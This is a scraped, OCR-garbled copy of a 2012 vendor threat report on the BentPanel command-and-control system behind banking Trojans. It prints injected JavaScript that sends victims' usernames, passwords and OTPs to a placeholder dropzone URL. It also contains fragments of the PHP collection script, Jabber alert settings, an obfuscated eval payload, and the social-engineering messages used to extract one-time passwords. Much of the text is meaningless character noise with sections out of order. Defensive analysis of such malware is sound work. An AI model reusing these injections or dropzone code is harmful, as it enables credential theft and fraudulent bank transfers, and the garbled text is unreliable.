Command and Control Form grabber
Contents
1. 0 var script document createElement script script type text javascript head appendChild script script src 000000000000 S bname demobank activ adata username document getElementById useraname value password document getElement ById password value window location In some cases the attacker will also use a flash based cookie capturing method to receive the victim s cookie The injected code will include the following URL http nfriedly github com Javascript Flash Cookies storage swf T andling cross domain flash cookies SwfStore SwfStore is a JavaScript library for cross domain flash cookies It includes a swf file that handles the storage and a JavaScript interface for loading and communicating with the flash file Getting started instructions hittp nfriedly com techblog 2010 0 7 swi for javascript cross domain flash c ookies Working example http nfriedly github com Javascript Flash Cookies The cookie is sent to the attacker s dropzone using this request http dropzone net XXX tXXXX php bname demobank amp GetCookie 3 Once the attacker has the victim s information the victim is asked to wait While he is waiting the transaction can be made Demo Bank 7 n User Name Please wait while we check your account Password A VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 32. 7 d i 19 j e 3 T74N f g h j sD E u b x 4R 9 a w V av 79 bD w V R 79 c W 1V 6X 6Y 62Z 70 3P 71 7 a amp a B gt 0 F 9 i 0 i lt a B i F 9 e 07e lt c B e 7 e 0 e lt c B e 7 b i X U M c e 1 p i A C L 9 4S x 9 g v 9 h W 1V 79 379 k 9 17 9 m 9 n 72 0 73 0 79 o 2L 0 4T 1 79 p 3f v 9 q 9 7q amp 4Y amp 4Y lt la gt lt 4U gt x 2N a b u a amp amp b a V b v x 4Z a 7 a amp amp a B gt 0 F 9 i 0 i lt a B i h 7h a i x 50 F 9 i 0 i lt h B i 7 h i u E u v x 1k a 7 t s 20 y u x 3Y a b 7 as ik a B gt 1 9 c 1k a M q 2k 1 2E v 9 d 1M 1k a 9 e d 3U b 7 c d d 1 9 f a T iv 1X d 1X e lt 02e 1 e q 2k q 3Z q 2k a T x 2P a b 7 a amp a B gt 1 b gt 0 f a a iv sii 7i b 51 O F 9 i 0 i lt ib B i 7 a U M ib i in U 1 a U M ib i io u E 40 7j u v u v u vix S2 F 9 1 071 lt 1b B 1i 0 2L 3U 1b i 1im 0 2L 0 4T x 53 7 36 3 36 0 2L x 54 7 35 3 35 0 2L x 55 7 37 9 a 7 2P 1k b 4 0 a i A C L y 7 58 20 S 1k b 4 amp amp 2P 1k b 2 1 a i A C L 7 a it1 7 1k a it1 M 1 7k 1 amp 61k a it 1 U M 71 1 a i i 0 i lt a B i 9 b 2N a i 57 7 b amp amp b B gt 0 7 2P 1k b 1 0 a i A C L p 3f E y 7 2P 1ik b 2 1 amp amp 58 20 5 1k b 1 a i A C L p 3f E 7 p 3f amp 7q 7r 3g 7s
3. 2M 3q 7t 2M 3q 7u 2M 7v 7w 3X 3X 3q 7x 2M Sa 7Ty 19 Sb gt 5c 5d Se lt la gt y 2c 1y T lt la 5a 5f 41 5 41 7z 7A 7B 19 5Sb 50 53 x 5q 33 e3h 4S73h 5n 35 36 37 2c 2x Sk 7 7C 1j 3T 7 1j 16 B gt 0 amp amp 1j 16 0 7D 51 u y 7 13 16 B gt 0 amp amp 1j 16 0 7 1 243 4461F212 3j 7 70 2ZA 1 16 2 1q 1 16 7 3 57 40 1 16 7 4 SHE Sea Sul yi 1197 9 aw 1V sa 1 16 Sn a 1 i 2Esv3S0 a 2 a W 1V 9 b 15 7 b M 4P 1 a b 16 10 a 1 in a 2 2u 2m a 3 gt 24 2m a 4 s2v 2m a 5 79 r 3e 7 r O 1 u y 9 c 9 d 377 2Q P Q i 5 d 3 c 1N 21 P Q 45 5r 46 1B D c E 7 46 0 1 su y 1C 46 N d su u y H 71I 3I 3W 2z 7J 1K 7K 4Q O 1 u y 7 1i 99 1qg 2 s2n 1q 2 4 su 7 w I 3k w I 3k 1y 3a w 1I 3k 79 c w 2w 7L c 7M 2d 7N 0 19 3k 77 c 2F c 47 x 7 c 2F 70 c 2F 30 c 47 2B b vic 7P x b c 1 7 4K 1A amp 7Q i S a fw Y N 1N 1p P Q 1 25 26 1p21f 43 4461f 1r 35 u a a iv g 28 iv g 29 Su a 5k x Sm 4R 77 3HE 3h 5i 3h 75 3C 1z 3Q y 7 10 2 49 y 7 10 3 5x y 7 10 4 7 7T 4E yf 1ic 2E y 7 10 5 ic 2E x 2n a b 10 b79 c 1r 7U F 9 d 3P a c E 0 1r 7V amp 1ld 4K 1d 61Z 20 W 21 x 5z 2b 31 19 31 77 1Q 31 lt 1 2R SA r n
4. The TAN s administration panel Log off Bent Admin Current time 09 24 10 Options User Agent Help BotAdmin Show actions Netherlands DropAdmi Portugal 65 k limit if 5 65 kimi fs The IP of Date and Minimum the BOT time TAN value Maximum The attacker s transfer TAN value limitations VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 The transactions configurations P pentAaqmin Current time 08 40 51 Bank Options User Agent Help BotAdmin how actions Netherlands DropAdmin Netherlands BaN Satran otiont 335 o o m o es a n an o E ae The amount configurations The User s Manual originally in Russian Statuses 0 at login screen is displayed in the process of waiting for 5 minutes 1 requested token 2 requested token 5 at login window is displayed during the process of waiting 15ti seconds 999 blocking access if you do not change the status of 0 for example you are not a companies we waited 5t minutes the bot will be able to log in and he setted status 5 when a change of status from 0 to 1 token is requested immediately if the status of 1 on any you do not change through the minutes of 5t token is requested again when receiving the
5. pts started empty pnwrite state 1 jsess msg By function ction ByArgs a var b tag false error false element false VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 Summary e The bentpanel is a very convenient platform to control the Trojans received information e tis very simple to implement and does not require any special skills from the attacker e tcaptures all of the information in an SQL database and logs it in TXT files as well e The platform widely spread and very common on the wild especially in Europe e The platform is equipped with real time alerting the attacker regarding attacks VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com
6. Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 Example of the information recived via the Jabber Alerts x The information as it is displayed to the attacker 20120528 08 40 37 Incoming data IP HEB Additional data EERE Looin 5 QREEPS Pasnummer 093 https vv aaa Admin file The file loads the attacker s management console Loading this page will provide him with the console that enables him to view edit and manage his captured credentials The page is usually password protected and looks like this A a D 09 lt gt Password Login VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 Once the attacker enters his password he is able to review the captured information There are more than a few management consoles with different types of functions features and graphics The most basic one looks like this Z Country onebank cantik orooro oo e e bo bo e a nanihesk fifthbank Another example x Google v 9 Search 7 Si Translate More gt gt Sign In Log off i Bent Admin Current time 08 37 30 Bank Options User Agent Help BotAdmin Netherlands Germany DropAdmin Netherlands
7. attacker The system is widely spread since it is very simple to implement and very user friendly The system includes the following features e Creation of users credentials database SQL and text files e Realtime victim alert via Jabber e Custom skins for management Recognition of the system This kind of C amp C can be identified according to the post request that is sent from the infected computer to the location of the system The request usually contains the following parameters this is the request sent from the user The bank s name According to the According to the The bank s URL Parameter bank s forms bank s forms http dropzone net xxx xxx php gt bname bankname amp activ amp adata Password 1234567 authcode 543214https demobank com Login2 0 RTLogbn login aspx guid a2c313c7 eca2 4224 a95f 9d9c3e050a97 The victim s identifier Another common identifier of the system is the waiting sign that is injected to the user while the information is sent to the attacker and the transaction is executed The GIF looks like this spinning wheel ly Usually by the same name It can be usually found at http dropzone net xxx xxxxxxx_loading gif VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 Important files The C amp C pl
8. token changing status from 1 to 2 immediately requested the token immediately as when changing from 2 to 1 if the status of 2 on any you do not change through the minutes of 5t token is requested again by changing the status to 999 blocked the entrance status 5 put those users whose status was 0 and they waited five minutes came to the site Options Sender Pass whipped toads sender Sender Jid Toad the sender it should be zaregatsya anywhere BentAdmin Pass flogged by admin Reciever Jid your gills gills that will receive messages from the gills Display Bot Limit the number of boats displayed in the list of bots to each jar Deafault status the status of the default if left on for a long time to put a better status 5 List Bot Bot Ip IP bot Time Time date of the last call Status status of the bot Query a query which zavprashivat a bot with the statuses 1 2 Min value the minimum number of characters request Max Value Maximum number of characters request Reservel reserve not used Reserve2 reserve not used Comment Additional comment message which will be seen boty with the status of 999 for example the phone slides 555 55 555 Color color used for myself so it was easier to orentirovatsya bots Own Comment your comment ispolzketsya pametki for themselves as for example to record the balance Action save changes to a specific bot Show Actions Search Bot by Ip search bots descend to the appropriate IP Status
9. v 1lu d a 0 V c k 7 d amp amp d B gt 0 F 9 i O i lt d Brit F 9 e 2 e lt a Bre 9 f W 34 ale 16 1 3E 7 d i 3F a e 16 0 2Bee S d i 3F al e 16 0 v x 4x a 9 b 1H v lu v 4wiv 7 a amp a B gt 2 9 c a O0 V al1 7 c amp amp c B gt 0 F 9 i 0 i lt c B i F 9 e 2 e lt a Bret 9 d W 34 ale 7 d S c i T U b 1H E yf 4x 3G 2D 4u 9 3H v 9 35 2D 2C w 17 19 60 79 36 2D 2C w 17 19 6h 79 2c 2D 2C w 31 19 6i 79 37 2D 2C w 3I 19 65 9 38 W 1V 9 1b W T 37 y 7 1h 3N amp amp a amp amp a 2F 30 3L a 39 w 3M 4A 37 x 4Bl a b i7 a i7 w 1I iW fw 1I 1W ly 3a w I 1W 7 w 1I 2G iw 1I 2G 1y 3a w 1I 2G 6k 3Li4y 3M 61 6m 0 gt lt 4C gt s d lt 2y 6n 6o lr a 19 26 6p 1W gt F 9 e 3P b dt lt 20 4 4D 1I e gt b e lt 2d 4D gt d Ss N a Y N 3R 0 a Y N 4F 1 gt 38 2e 14A 38 6r K b r n a 4G T 4B 63 38 u E x 1X a fa a 4H iv SI a 27 6t a a 0 4I a 2J 6u a a 270 35 a 2 0 6v 2K a2 a 270 35 a 2 4H 37 2K lt 10 2K 0 4 2K F 9 i 0 i lt 2d 3S a B 1 i 3 i a a 4d 0 a B 4 i 3 a 40 a B 4 i 7 a 2B a 3T a 2B a 3T ja a _ u v y u E x K b x 13 a u S f 3c a gt gt 4 3c a amp 6x 9 c 6y 6z 9 d amp 2 9 e c d 9 h b 3c i 7 c M h 1 g g h
10. 0 RTLogbn login aspx guid a2c313c7 eca2 4224 a95f 9d9c3e050a97 P Xz 127 0 0 1 demobank default php Captured by the Trojan The request that is sent from the user s browser after submitting the information in this case demo bank would be http dropzone net XXX XXX php bname demobank amp activ amp adata username 1234567 password 54321 https demobank com login php guid a2c313c7 eca2 4224 a95f 9d9c3e050a97 This is a part of the injected code that sends the information to the dropzone function o00000000000 7 i The request that will be o00000000000 o00000000 var head document getElementsByTagName head 0 sent to the main file var script document createElement script script type text javascript head appendChild script script src o00000000000 S bn ame demobank activ adata username document getElementById useraname value password document getElement ById password value window location After the user s credentials are captured by the Trojan the HTML injections are done in order to capture the user s OTP to conduct the automatic transaction The attackers display different types of messages to the user in order to fool him to enter his OTP TOKKEN TAN VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe C
11. 4 7W 7u 7 1M 1R X B 466 1M 15 X B 4 1G X 1R X 2a X 15 X 30 H 5z z z 25 13 ZIN 20 1 sutz 6 a le vra 2Tl rubvi2Ri SA r n 4 7X ulblix 48la b 9 c a ViI R 7 c amp amp c BOO F 9 i O i lt c B i icfil ie b ix 5 A sample of the code de obfuscated ppacity value 0 ppacity object ppacity is set false bpcTimeout List of all aaa ppacity div document getElementById opacity div the simple wait div document getElementById simple wait div an div document getElementById tan div varia b es an div operation id document 5 getElementById tan div operation id that are an_div_button document getElementById tan_div_ button an_div_a document getElementById tan_ div a use d fo r th e an div select document getElementById tan_ div select an div input _1 document getElementById tan_ div input 1 attack an div input 2 document getElementById tan div input 2 an wait img document getElementById tan wait img ogin input GetObjectByName document user input false ba ssword input GetObjectByName document password input false ogin form GetObjectByName document Form Auth form true GetObjectByName document loginformi form true ogin_form_onsubmit GetAction login form onsubmit prig tanl input prig tan2_ input prig card select prig operation_id label login empty password empty
12. 77 of infections are from legitimate sites to safeguard the information transmitted between the client Most financial Trojans e g Zeus have long life spans and may be undetected by an anti virus and the organization Over 537 active Zeus crime ware domains active worldwide Script injections Recently several Trojan horses i e Zeus SoyEye CarBerp started using script injection techniques in order to modify the original web page The modification may enable the attacker to perform money transactions using the victimized users credentials This may be perpetrated by a Trojan horse injecting a malicious java script code to the client s browser once the client is connected to the website The code that is injected perform different functions including attempting a money transfer from the client s account VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 In order to maintain the information sent by the Trojans the attackers have developed different types of command and control systems that enable them to grab and manage the information sent by the Trojan The systems are usually PHP based systems accompanied by an SQL database Malicious Script in the source C o View Soe
13. 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 Executing the automatic transaction Two common ways e Injecting a Javascript on the client side that will use the captured user information credentials cookie and OTP to perform the automatic transaction e Using an automated script on the server side that will use the victim s captured information in order to perform the transaction Both ways are found on the wild and can be used by the attacker Here is a sample of a Javascript that is loaded on the victim s side and is able to perform the transaction Eval eval function p 4 c k e zr e function c return c lt a e parseInt c a c cta gt 35 String fromCharCode c 29 c toString 36 if replace String obfuscation E e sete tease ne RegExp b e c b g k c sreturn p 9 z 1 9 1i 1 9 D 9 3v 9 1x 6a 9 2t 0 9 H 9 1D TF 4n P Q 7 7 P Q i S w 40 w 40 P Q 79 2X w 1I 2X 37 2KEE 1p P V QUA LE A 25 26 1p i S w N 2X A C L x 3w 9 a w 1I 6b 7 a a A C L 9 1t 0 9 1g 9 27 v 9 22 9 3y 9 11 w 1I 11 79 14 w 1 14 79 15 w 1 15 79 3z w 1 3z 79 30 w 1 30 79 3i w 1 31 79 1Q w 1 1Q 79 1R w I 1R 9 15 w 12 1T w 6d 2y E 1T w 6e 2y E 29 3C 4t 1zZ 733 59 1G 9 2a79 2b 9 3D 9 1A 22 7 79 2A 2z 9 1q 2z 9 10 179 1j 9 4u x x 4v a 9S b 1H
14. Search the slope bot to the desired status Own Comment search bots descend with a certain mark for themselves on the field Own Comment button Search provides Search Logs for bank log duplicated that was sent to the recipient zhabyuer button Delete Text Log clear text log of the bank button Delete User Agent Log log user agent to clear the button Delete SQL Logs clear the list of bots button Delete All Logs clear text logs of the bank log user agent and a list of bots button Delete Bot By Status remove from the list of those bots bots that have a status button Delete Bot By Comment remove from the list of those bots bots that have a specific your comment Own Comment Button Enable Disable Jabber enables or disables the sending of the bank in zhabber at Off position with the bank s new bots will automatically put the status of five VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 The victim s side The user connects to the bank s login page The Trojan identifies the page as a target and injects the malicious code into the user s browser The code captures the user s credentials and sends them to the attacker s drop zone http dropzone net XXX XXX php bname bankname amp activ amp adata Password 1234567 authcode 54321 https demobank com Login2
15. atform contains a few important files that enable it to capture the information that is sent from the victim The most are important files are e Main file captures the information logs it and delivers it to the database e Database connection configuration file e C amp C management file e Jabber connection Main PHP This file is the most important file on the platform The request that is sent from the victim after the injection is delivered to this file which is able to parse the information log it and enter it to the database The request that is sent from the victim looks like this http dropzone net xxx xxx php gt bname bankname amp activ amp adata Password 1234567 authcode 543214https demobank com Login2 0 RTLogbn login aspx guid a2c313c7 eca2 4224 a95f 9d9c3e050a97 If we look on the XXX php code we can see how it handles the information 1 Connecting to the database the main file includes the config file that contains the information that enables it to connect to the database SQL 2 The file verifies that the information that is received comes from a known bank if not the information is dropped Please note this verification doesn t appear in all the dropzones Some of the main files create a new client according to the information that is received The server s configurations file variables lt php The database connection parameters Sdbhost Sdbuser Sdbpass gt Sdbname d
16. efault status 0 Sjabber server xmpp jp F The Jabber connection Sjabber id ewy credentials Jabber pass or Er Ham ree your Jabber a gt VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 Including the Bank verification xxxx php file lt php if isset _GET Il in_array _GET array link mysql_connect dbhost S dbuser dbpass if link die mysql_error Connecting to the database with the configuration if mysql_select_db dbname parameters die mysql error 3 Parsing the information and inserting it into the database SQL and TXT file De mysql_real_escape_string _GET if isset _ GET Af Sresult die die Could not query mysql error Checking if it the first recorded information if mysql num rows S result gt 0 row mysql fetch assoc Sresult F mysql_query i mysql real escape string SERVER if mysql num_rows result gt result mysql query intval time mysql real escape string _ SERVER n Srow la else result mysql_query intval time mysql real escape string _SERVER S default status row Srowl
17. elping them prevent harm to their brand image and avoid significant economic damage Furthermore Versafe provides professional services and advanced research capabilities in the field of cybercrime including malware Trojan horses viruses and infringing materiel VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 The Threat Trojans are malware that appears to the user to perform a desirable function but perhaps in addition to the expected function steals information or harms the system Two main techniques used by Trojans in order to steal the users credentials or initiate money transactions on their behalf are e Modifying the website s client side webpage e Sniffing the browser s activity for information which is sent to different banks before the packets are encrypted by SSL Versafe s knowledge is based on extensive research into the Malware attacks have grown by 600 since several forms of Trojan infections experience with cleaning 2008 infections and repairing the damage caused by zero day Top 20 malwares gt 1 25M infected computers Anew web page is infected every 1 3 seconds threats Our deep understanding of how the malware works is 2M web pages infected each month the key to producing the right defence mechanisms required lt
18. i i formation O oau message oriented middleware 2 It was pear E re ey see ee developed by the Jabber open source a ee eer community in 1999 Built to be extensible Jethis resouna esanourie the protocol has been extended with pn ee ee features such as Voice over Internet gt this gt basejid this gt user this gt host Protocol and file transfer signalling gt this gt roster new Roster gt this gt track_presence true gt this gt stream_start lt stream stream to Sserver Tersion 1 0 gt this gt stream_end lt stream stream gt gt this gt default_ns jJabber client S this gt addxXPathHandler http Sthis gt addxXPathHandler urn i Sthis gt addxXPathHandler urn i parameters Sthis gt addxXPathHandler urn i URL s and server The massage that is sent via Jabber as coded in the main file include yy Sconn new XMPPHP_XMPP S jabber_ server 5222 jabber_id jabber_pass QR null Sprintlog true loglevel LOGGING_INFO conn gt connect The Jabber s control panel The message that is sent to the Log off attacker Current time 09 30 28 Bank Options User Agent Help BotAdmin Netherlands DropAdmin Netherlands Ch am E The attacker s system password VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel
19. iE row Slogfile fopen ER fwrite Slogfile SERVER fclose Slogfile Choosing the bank s parameters Checking if the victim s IP exists in the database if it does it modifies it s properties and if it doesn t it creates a new record Logging the information into the bank s txt file Please note the information that is recivied and logged In the TXT file is not checked and sanitized which means it can contain any random information VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 XMPP and Jabber 4 Informing the attacker of new information logged in What are XMPP Extensible Messaging the database via XMPP and Jabber and Presence Protocol and Jabber The XXXX php file contains the connection parameters f f aa Extensible Messaging and Presence and functions and included in the main file Here is a Protocol XMPP formery named labber sample of the XXXX php file is an open XML based protocol originally aimed at near real time extensible instant messaging IM and presence information e g buddy lists but now expanded into the broader realm of The basic public function construct host Sport user Spassword connection parent construct host Sport S printlog loglevel
20. ne htp erww demohank iomat Dropzone Pan Oe oh p ie oe p eh ara Ta te ew wh org Lit ohne or yer tee oms type beni Si of ml e ee Com wreeTL ee te my 1 a Se ee ad ok ea oi me a Saat cel eal he ope alas ete lt ail SOC EEEE ETTORE script language javascript wee trttp eww becker com Aste Trenmuter po lt reript gt TW as Ta AT A TY alae riers uae ea TTT tear a IA Td anh i i E iR t rey im FEFE Infected computer The Botnet architecture In order to avoid shutdown and fast detection the attacker is using several proxy servers under different domains that forward the information to the main server This method enable the Botnet to exist if one of the domains servers is shutdown The basic structure looks like this T SPETESISEST STP UTEEEEROEED P Te zA seas LL LLL anne FEST T SESTTETISSTON SATETERLETEREE Fa The attackers main server Domains that serve as proxies VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com COT versafe Confidential VERSAFE June 2012 BentPanel command and control platform The Bentpanel C amp C platform is a very simple platform written in PHP that has the ability to receive the victim s information sort the information and display it to the
21. onfidential VERSAFE June 2012 How it works 1 The victim gets a massage related to new security steps needed for his account Dear client The main concern of the bank is and remains the highest possible level of service delivery for our customers in compliance with all required quality and safety standards aN j Currently there is the security system updated and tested Demo Bank Every step of the subsequent verification process can take up 5 minutes long Be patient please and do not try to refresh the page if you follow these steps Password To prevent unauthorized access to your bank account to come We want to be sure that exactly the real owner of this account 2 The client is requested to enter his OTP Demo Bank 3 Dear client User Name Password Please provide us with your OTP in order to continue OTP VERSAFE Ltd Secure Login 11 Moshe Levi St UMI Building Rishon Le Zion Israel Tel 972 3 9622655 Fax 972 3 9511433 info versafe login com www versafe login com versafe Confidential VERSAFE June 2012 The information is delivered to the attacker s dropzone as well as can be seen according to the injected code function o00000000000 The request that is sent to the o00000000000 000000000 attacker including the OTP var head document getElementsByTagName head
22. versafe secure login Command and Control Form grabber Trojans ATC Automatic transaction y Bent Admin The material in this report is strictly confidential and contains proprietary information and ideas of Versafe Ltd versafe Confidential VERSAFE June 2012 Versafe Introduction executive summary Versafe eliminates online identity theft and financial damages by preventing Phishing Trojans and Pharming attacks We also specialize in taking actions to foil online fraud and commencing shutdown of websites hosting infringing material Versafe offers products and services that complement existing anti fraud technologies improving the clients protection against the aforementioned malicious activity and providing an encompassing defence mechanism Versafe products are either software or services based customized to the needs of each client individually Versafe enables financial organizations working online to gain control over areas that were virtually unreachable and indefensible up till now and neutralize local threats found on their clients personal computers without requiring the installation of software on the end user side The transparent solution does not alter the user experience in any way facilitating a seamless installation on the firm s web sites Versafe s one of a kind solution has proven its exceptional effectiveness time and again in a large number of financial institutions worldwide h
23. vi9 j b 6B i 7 3 lt 6C q q 1s 5 7 j gt 6D amp amp j lt 6E g g 1s gt gt 6 6F g g 1s j amp 2g 2h 7 j gt 6G amp amp j lt 6H g g 1s j gt gt 12 61 sg q 1s g g 1s j gt gt 18 6K g g 1s j gt gt 12 amp 2g 2h g g 1s j gt gt 6 amp 2g 2h g g 1s j amp 2g 2h u g x 4t a b 7 a u 9 c a 3F b cH c 727 c 3R 0 8 U x c c f a V c 7 f amp F B gt 0 fF 9 1 071 lt f B71i 7 F i 11 amp e amp s amp F i 11 U M b U gt O amp d d amp amp E i 1 I b fe F i u e x 4L a b c d 9 e v77 a i9 f a Vic d f i 10 b fe f i u e x 1Bla b c 7 a c H 1B z z 1K 2i 2j u v9 d v 7 a i9 e a V a 7 e e B gt 0 F 9 i O i lt e B i 7 e i N ZI su vi y 7 c H 1B z 4z4 1K 4M ZI su v u d x G a b c d 9 e v 7 a 9 f a V c 27 EE B gt 0 F 9 i 0 i lt f B i 7 f i 19 amp 6 es amp amp f i 19 U M a 1L a 1L a 3d a T y u x 1M a 9 b a a 7 a B gt 0 9 c 6M F 9 i 0 i lt a B i 9 d a 3c i 7 c M d gt 0 7 d d sb d u 3U b H 3e z z 60 6P 3W 6Q 6R 65 6T u viy 7 1x gt 2u 1x lt 24 im 3V 1x 2v u E y 7 1x gt 24 1m 3V 24 2v u E y H 3e z z 6U 6V 3W 2B u im c ib e 6W j d x 40 a 9 b v 7 a M 4P gt 0 iu b y 9 c w 2w 1a c A C L w J 2I c c T a 9 d c V la 7 d f F 9 i 0 i lt d B i
Download Pdf Manuals
Related Search